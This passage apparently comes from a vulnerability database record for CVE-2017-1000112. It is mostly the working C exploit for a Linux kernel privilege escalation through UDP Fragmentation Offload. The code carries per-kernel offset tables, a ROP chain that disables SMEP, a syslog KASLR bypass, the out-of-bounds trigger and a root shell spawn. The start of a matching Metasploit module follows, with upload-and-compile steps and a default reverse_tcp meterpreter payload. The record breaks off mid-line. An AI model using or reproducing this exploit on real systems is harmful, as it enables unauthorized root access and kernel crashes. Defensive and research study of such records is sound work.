0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-49-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-52-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-54-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-56-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-58-generic\", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },\r\n { \"xenial\", \"4.4.0-81-generic\", 0xa2800, 0xa2bf0, 0x8a, 0x3eb4ad, 0x112697, 0x1b9c0, 0x40341a, 0x1de6c, 0x7a453, 0x125787, 0x64580, 0x49ed0 },\t\r\n};\r\n\r\n// Used to get root privileges.\r\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\r\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\r\n\r\n// Used when ENABLE_SMEP_BYPASS is used.\r\n// - xchg eax, esp ; ret\r\n// - pop rdi ; ret\r\n// - mov dword ptr [rdi], eax ; ret\r\n// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret\r\n// - neg rax ; ret\r\n// - pop rcx ; ret \r\n// - or rax, rcx ; ret\r\n// - xchg eax, edi ; ret\r\n// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret\r\n// - jmp rcx\r\n#define XCHG_EAX_ESP_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)\r\n#define POP_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rdi_ret)\r\n#define MOV_DWORD_PTR_RDI_EAX_RET\t(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)\r\n#define MOV_RAX_CR4_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)\r\n#define NEG_RAX_RET\t\t\t(KERNEL_BASE + kernels[kernel].neg_rax_ret)\r\n#define POP_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rcx_ret)\r\n#define OR_RAX_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)\r\n#define XCHG_EAX_EDI_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)\r\n#define MOV_CR4_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)\r\n#define JMP_RCX\t\t\t\t(KERNEL_BASE + kernels[kernel].jmp_rcx)\r\n\r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root(void) {\r\n\t((_commit_creds)(COMMIT_CREDS))(\r\n\t ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *\r\n\r\nuint64_t saved_esp;\r\n\r\n// Unfortunately GCC does not support `__atribute__((naked))` on x86, which\r\n// can be used to omit a function's prologue, so I had to use this weird\r\n// wrapper hack as a workaround. Note: Clang does support it, which means it\r\n// has better support of GCC attributes than GCC itself. Funny.\r\nvoid wrapper() {\r\n\tasm volatile (\"\t\t\t\t\t\\n\\\r\n\tpayload:\t\t\t\t\t\\n\\\r\n\t\tmovq %%rbp, %%rax\t\t\t\\n\\\r\n\t\tmovq $0xffffffff00000000, %%rdx\t\t\\n\\\r\n\t\tandq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %0, %%rdx\t\t\t\t\\n\\\r\n\t\taddq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %%rax, %%rsp\t\t\t\\n\\\r\n\t\tcall get_root\t\t\t\t\\n\\\r\n\t\tret\t\t\t\t\t\\n\\\r\n\t\" : : \"m\"(saved_esp) : );\r\n}\r\n\r\nvoid payload();\r\n\r\n#define CHAIN_SAVE_ESP\t\t\t\t\\\r\n\t*stack++ = POP_RDI_RET;\t\t\t\\\r\n\t*stack++ = (uint64_t)&saved_esp;\t\\\r\n\t*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;\r\n\r\n#define SMEP_MASK 0x100000\r\n\r\n#define CHAIN_DISABLE_SMEP\t\t\t\\\r\n\t*stack++ = MOV_RAX_CR4_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = POP_RCX_RET;\t\t\t\\\r\n\t*stack++ = SMEP_MASK;\t\t\t\\\r\n\t*stack++ = OR_RAX_RCX_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = XCHG_EAX_EDI_RET;\t\t\\\r\n\t*stack++ = MOV_CR4_RDI_RET;\r\n\r\n#define CHAIN_JMP_PAYLOAD \\\r\n\t*stack++ = POP_RCX_RET; \\\r\n\t*stack++ = (uint64_t)&payload; \\\r\n\t*stack++ = JMP_RCX;\r\n\r\nvoid mmap_stack() {\r\n\tuint64_t stack_aligned, stack_addr;\r\n\tint page_size, stack_size, stack_offset;\r\n\tuint64_t* stack;\r\n\r\n\tpage_size = getpagesize();\r\n\r\n\tstack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);\r\n\tstack_addr = stack_aligned - page_size * 4;\r\n\tstack_size = page_size * 8;\r\n\tstack_offset = XCHG_EAX_ESP_RET % page_size;\r\n\r\n\tstack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n\tif (stack == MAP_FAILED || stack != (void*)stack_addr) {\r\n\t\tperror(\"[-] mmap()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstack = (uint64_t*)((char*)stack_aligned + stack_offset);\r\n\r\n\tCHAIN_SAVE_ESP;\r\n\tCHAIN_DISABLE_SMEP;\r\n\tCHAIN_JMP_PAYLOAD;\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nvoid mmap_syslog(char** buffer, int* size) {\r\n\t*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (*size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\t*size = (*size / getpagesize() + 1) * getpagesize();\r\n\t*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n\t\t\t\t MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n\t*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n\tif (*size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (end = start; substr[end] != '-'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xffffffffff000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (start = 0; substr[start] != '-'; start++);\r\n\tfor (end = start; substr[end] != '\\n'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr() {\r\n\tchar* syslog;\r\n\tint size;\r\n\tmmap_syslog(&syslog, &size);\r\n\r\n\tif (strcmp(\"trusty\", kernels[kernel].distro) == 0 &&\r\n\t strncmp(\"4.4.0\", kernels[kernel].version, 5) == 0)\r\n\t\treturn get_kernel_addr_trusty(syslog, size);\r\n\tif (strcmp(\"xenial\", kernels[kernel].distro) == 0 &&\r\n\t strncmp(\"4.4.0\", kernels[kernel].version, 5) == 0) ||\r\n\t strncmp(\"4.8.0\", kernels[kernel].version, 5) == 0)\r\n\t\treturn get_kernel_addr_xenial(syslog, size);\r\n\r\n\tprintf(\"[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\nstruct ubuf_info {\r\n\tuint64_t callback;\t// void (*callback)(struct ubuf_info *, bool)\r\n\tuint64_t ctx;\t\t// void *\r\n\tuint64_t desc;\t\t// unsigned long\r\n};\r\n\r\nstruct skb_shared_info {\r\n\tuint8_t nr_frags;\t// unsigned char\r\n\tuint8_t tx_flags;\t// __u8\r\n\tuint16_t gso_size;\t// unsigned short\r\n\tuint16_t gso_segs;\t// unsigned short\r\n\tuint16_t gso_type;\t// unsigned short\r\n\tuint64_t frag_list;\t// struct sk_buff *\r\n\tuint64_t hwtstamps;\t// struct skb_shared_hwtstamps\r\n\tuint32_t tskey;\t\t// u32\r\n\tuint32_t ip6_frag_id;\t// __be32\r\n\tuint32_t dataref;\t// atomic_t\r\n\tuint64_t destructor_arg; // void *\r\n\tuint8_t frags[16][17];\t// skb_frag_t frags[MAX_SKB_FRAGS];\r\n};\r\n\r\nstruct ubuf_info ui;\r\n\r\nvoid init_skb_buffer(char* buffer, unsigned long func) {\r\n\tstruct skb_shared_info* ssi = (struct skb_shared_info*)buffer;\r\n\tmemset(ssi, 0, sizeof(*ssi));\r\n\r\n\tssi->tx_flags = 0xff;\r\n\tssi->destructor_arg = (uint64_t)&ui;\r\n\tssi->nr_frags = 0;\r\n\tssi->frag_list = 0;\r\n\r\n\tui.callback = func;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define SHINFO_OFFSET 3164\r\n\r\nvoid oob_execute(unsigned long payload) {\r\n\tchar buffer[4096];\r\n\tmemset(&buffer[0], 0x42, 4096);\r\n\tinit_skb_buffer(&buffer[SHINFO_OFFSET], payload);\r\n\r\n\tint s = socket(PF_INET, SOCK_DGRAM, 0);\r\n\tif (s == -1) {\r\n\t\tperror(\"[-] socket()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct sockaddr_in addr;\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(8000);\r\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\r\n\tif (connect(s, (void*)&addr, sizeof(addr))) {\r\n\t\tperror(\"[-] connect()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint size = SHINFO_OFFSET + sizeof(struct skb_shared_info);\r\n\tint rv = send(s, buffer, size, MSG_MORE);\r\n\tif (rv != size) {\r\n\t\tperror(\"[-] send()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint val = 1;\r\n\trv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));\r\n\tif (rv != 0) {\r\n\t\tperror(\"[-] setsockopt(SO_NO_CHECK)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsend(s, buffer, 1, 0);\r\n\r\n\tclose(s);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\n#define CHUNK_SIZE 1024\r\n\r\nint read_file(const char* file, char* buffer, int max_length) {\r\n\tint f = open(file, O_RDONLY);\r\n\tif (f == -1)\r\n\t\treturn -1;\r\n\tint bytes_read = 0;\r\n\twhile (true) {\r\n\t\tint bytes_to_read = CHUNK_SIZE;\r\n\t\tif (bytes_to_read > max_length - bytes_read)\r\n\t\t\tbytes_to_read = max_length - bytes_read;\r\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\r\n\t\tif (rv == -1)\r\n\t\t\treturn -1;\r\n\t\tbytes_read += rv;\r\n\t\tif (rv == 0)\r\n\t\t\treturn bytes_read;\r\n\t}\r\n}\r\n\r\n#define LSB_RELEASE_LENGTH 1024\r\n\r\nvoid get_distro_codename(char* output, int max_length) {\r\n\tchar buffer[LSB_RELEASE_LENGTH];\r\n\tint length = read_file(\"/etc/lsb-release\", &buffer[0], LSB_RELEASE_LENGTH);\r\n\tif (length == -1) {\r\n\t\tperror(\"[-] open/read(/etc/lsb-release)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tconst char *needle = \"DISTRIB_CODENAME=\";\r\n\tint needle_length = strlen(needle);\r\n\tchar* found = memmem(&buffer[0], length, needle, needle_length);\r\n\tif (found == NULL) {\r\n\t\tprintf(\"[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint i;\r\n\tfor (i = 0; found[needle_length + i] != '\\n'; i++) {\r\n\t\tassert(i < max_length);\r\n\t\tassert((found - &buffer[0]) + needle_length + i < length);\r\n\t\toutput[i] = found[needle_length + i];\r\n\t}\r\n}\r\n\r\nvoid get_kernel_version(char* output, int max_length) {\r\n\tstruct utsname u;\r\n\tint rv = uname(&u);\r\n\tif (rv != 0) {\r\n\t\tperror(\"[-] uname())\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tassert(strlen(u.release) <= max_length);\r\n\tstrcpy(&output[0], u.release);\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\n#define DISTRO_CODENAME_LENGTH 32\r\n#define KERNEL_VERSION_LENGTH 32\r\n\r\nvoid detect_versions() {\r\n\tchar codename[DISTRO_CODENAME_LENGTH];\r\n\tchar version[KERNEL_VERSION_LENGTH];\r\n\r\n\tget_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);\r\n\tget_kernel_version(&version[0], KERNEL_VERSION_LENGTH);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n\t\tif (strcmp(&codename[0], kernels[i].distro) == 0 &&\r\n\t\t strcmp(&version[0], kernels[i].version) == 0) {\r\n\t\t\tprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\r\n\t\t\tkernel = i;\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\r\n\tprintf(\"[-] kernel version not recognized\\n\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n#define PROC_CPUINFO_LENGTH 4096\r\n\r\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\r\nint smap_smep_enabled() {\r\n\tchar buffer[PROC_CPUINFO_LENGTH];\r\n\tint length = read_file(\"/proc/cpuinfo\", &buffer[0], PROC_CPUINFO_LENGTH);\r\n\tif (length == -1) {\r\n\t\tperror(\"[-] open/read(/proc/cpuinfo)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint rv = 0;\r\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 1;\r\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 2;\r\n\treturn rv;\r\n}\r\n\r\nvoid check_smep_smap() {\r\n\tint rv = smap_smep_enabled();\r\n\tif (rv >= 2) {\r\n\t\tprintf(\"[-] SMAP detected, no bypass available\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#if !ENABLE_SMEP_BYPASS\r\n\tif (rv >= 1) {\r\n\t\tprintf(\"[-] SMEP detected, use ENABLE_SMEP_BYPASS\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#endif\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nstatic bool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n\tif (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tprintf(\"[!] unprivileged user namespaces are not available\\n\");\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (unshare(CLONE_NEWNET) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tperror(\"[-] sched_setaffinity()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo mtu 1500\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo mtu 1500)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo up)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid exec_shell() {\r\n\tchar* shell = \"/bin/bash\";\r\n\tchar* args[] = {shell, \"-i\", NULL};\r\n\texecve(shell, args, NULL);\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tprintf(\"[.] checking if we got root\\n\");\r\n\tif (!is_root()) {\r\n\t\tprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\tprintf(\"[+] got r00t ^_^\\n\");\r\n\texec_shell();\r\n}\r\n\r\nint main(int argc, char** argv) {\r\n\tprintf(\"[.] starting\\n\");\r\n\r\n\tprintf(\"[.] checking distro and kernel versions\\n\");\r\n\tdetect_versions();\r\n\tprintf(\"[~] done, versions looks good\\n\");\r\n\r\n\tprintf(\"[.] checking SMEP and SMAP\\n\");\r\n\tcheck_smep_smap();\r\n\tprintf(\"[~] done, looks good\\n\");\r\n\r\n\tprintf(\"[.] setting up namespace sandbox\\n\");\r\n\tsetup_sandbox();\r\n\tprintf(\"[~] done, namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\r\n\tprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\r\n\r\n\tunsigned long payload = (unsigned long)&get_root;\r\n\r\n#if ENABLE_SMEP_BYPASS\r\n\tprintf(\"[.] SMEP bypass enabled, mmapping fake stack\\n\");\r\n\tmmap_stack();\r\n\tpayload = XCHG_EAX_ESP_RET;\r\n\tprintf(\"[~] done, fake stack mmapped\\n\");\r\n#endif\r\n\r\n\tprintf(\"[.] executing payload %lx\\n\", payload);\r\n\toob_execute(payload);\r\n\tprintf(\"[~] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43418/"}], "metasploit": [{"lastseen": "2020-10-15T10:08:49", "description": "This module attempts to gain root privileges on Linux systems by abusing UDP Fragmentation Offload (UFO). This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled and SMAP disabled. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on various Ubuntu and Linux Mint systems, including: Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop; Ubuntu 16.04 4.8.0-53-generic; Linux Mint 17.3 4.4.0-89-generic; Linux Mint 18 4.8.0-58-generic\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/LOCAL/UFO_PRIVILEGE_ESCALATION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges on Linux systems by abusing\n UDP Fragmentation Offload (UFO).\n\n This exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0-21 <= 4.4.0-89 and 4.8.0-34 <= 4.8.0-58, including Linux distros\n based on Ubuntu, such as Linux Mint.\n\n The target system must have unprivileged user namespaces enabled\n and SMAP disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on various Ubuntu and Linux\n Mint systems, including:\n\n Ubuntu 14.04.5 4.4.0-31-generic x64 Desktop;\n Ubuntu 16.04 4.8.0-53-generic;\n Linux Mint 17.3 4.4.0-89-generic;\n Linux Mint 18 4.8.0-58-generic\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Andrey Konovalov', # Discovery and C exploit\n 'h00die', # Metasploit module\n 'bcoles' # Metasploit module\n ],\n 'DisclosureDate' => '2017-08-10',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'CVE', '2017-1000112' ],\n [ 'EDB', '43418' ],\n [ 'BID', '100262' ],\n [ 'URL', 'https://seclists.org/oss-sec/2017/q3/277' ],\n [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c' ],\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa' ],\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2017-1000112' ],\n [ 'URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/linux-kernel-vulnerability-can-lead-to-privilege-escalation-analyzing-cve-2017-1000112/' ],\n [ 'URL', 'https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html' ],\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/commits/cve-2017-1000112' ]\n ],\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ],\n },\n 'DefaultTarget' => 0))\n register_options [\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n cmd_exec \"chmod +x '#{path}'\"\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n output = cmd_exec gcc_cmd\n rm_f \"#{path}.c\"\n\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n cmd_exec \"chmod +x #{path}\"\n end\n\n def strip_comments(c_code)\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\n end\n\n def exploit_data(file)\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file)\n end\n\n def live_compile?\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\n\n if has_gcc?\n vprint_good 'gcc is installed'\n return true\n end\n\n unless datastore['COMPILE'].eql? 'Auto'\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\n end\n end\n\n def check\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n vprint_error \"System architecture #{arch} is not supported\"\n return CheckCode::Safe\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n version = kernel_release\n unless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|45|47|51|53|57|59|62|63|64|66|67|70|71|72|75|78|79|81|83|87|89|81|89)-generic/ ||\n version =~ /^4\\.8\\.0-(34|36|39|41|45|46|49|51|52|53|54|56|58)-generic/\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Linux kernel version #{version} is vulnerable\"\n\n vprint_status 'Checking if SMAP is enabled ...'\n if smap_enabled?\n vprint_error 'SMAP is enabled'\n return CheckCode::Safe\n end\n vprint_good 'SMAP is not enabled'\n\n config = kernel_config\n if config.nil?\n vprint_error 'Could not retrieve kernel config'\n return CheckCode::Unknown\n end\n\n unless config.include? 